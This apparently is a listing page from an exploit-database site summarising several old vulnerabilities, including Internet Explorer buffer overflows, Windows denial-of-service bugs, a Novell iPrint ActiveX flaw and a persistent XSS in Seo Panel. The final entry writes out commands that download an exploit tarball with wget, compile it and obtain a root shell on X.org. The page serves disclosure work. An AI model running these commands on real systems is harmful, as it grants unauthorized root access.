header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Internet Explorer “createTextRang” Download Shellcoded Exploit

This exploit is a remote system access vulnerability in Microsoft Internet Explorer 6.x & 7 Beta 2. It is caused by a buffer overflow in the createTextRange() function. The exploit uses a shellcode to download a malicious file from a remote server and execute it on the victim's machine. The exploit is unpatched and has a critical severity.

MSHTML.DLL IE Buffer Overflow

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mshtml.dll component of Internet Explorer. The vulnerability is due to a boundary error when processing a specially crafted HTML page. An attacker can leverage this vulnerability to execute arbitrary code under the context of the user running Internet Explorer.

MS06-007 Denial of Service POC exploit

This exploit is a proof of concept exploit created by Firestorm, based on zloSend.exe win32 exploit. It is used to send a malicious packet to the victim's machine, which causes a denial of service. It is tested on Windows XP SP2 as victim and compiled/runned on Fedora Core 4 x86.

Novell iPrint <= 5.52 ActiveX GetDriverSettings() Remote Exploit (ZDI-10-256)

This exploit is a remote code execution vulnerability in Novell iPrint <= 5.52. It is triggered by calling the GetDriverSettings() ActiveX control with specially crafted arguments. This will cause the application to execute arbitrary code, allowing an attacker to gain control of the system.

‘Seo Panel’ Cookie-Rendered Persistent XSS Vulnerability (CVE-2010-4331)

A vulnerability exists in 'Seo Panel' page rendering which allows for unfiltered, unencrypted content to be presented to a user through two different cookies. Alter the value of cookies called 'default_news' or 'sponsors' and then view a site page which includes controllers/index.ctrl.php or controllers/settings.ctrl.php that will render the cookies as they exist on the user's machine.

IGMP v3 DoS Exploit

This exploit is a Denial of Service (DoS) attack against IGMP v3 protocol. It sends a malicious packet to the target system which causes the system to crash. This exploit affects Microsoft Windows XP and Windows Server 2003.

Unspecified Event Handler Vulnerability

This vulnerability is caused by an unspecified event handler in the application. An attacker can exploit this vulnerability by crafting a malicious payload and injecting it into the application. This can lead to arbitrary code execution, information disclosure, and other malicious activities.

From Daniel Stone’s Advisory

Two second exploit, but if anyone is lazy: $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz $ tar -zpxvf xmodulepath.tgz $ cd xmodulepath $ ./root.sh /bin/rm -f exploit.o exploit.so shell *.o *.so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so gcc -o shell shell.c X Window System Version 7.0.0 Release Date: 21 December 2005 X Protocol Version 11, Revision 0, Release 7.0 [ snip ] r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

Recent Exploits: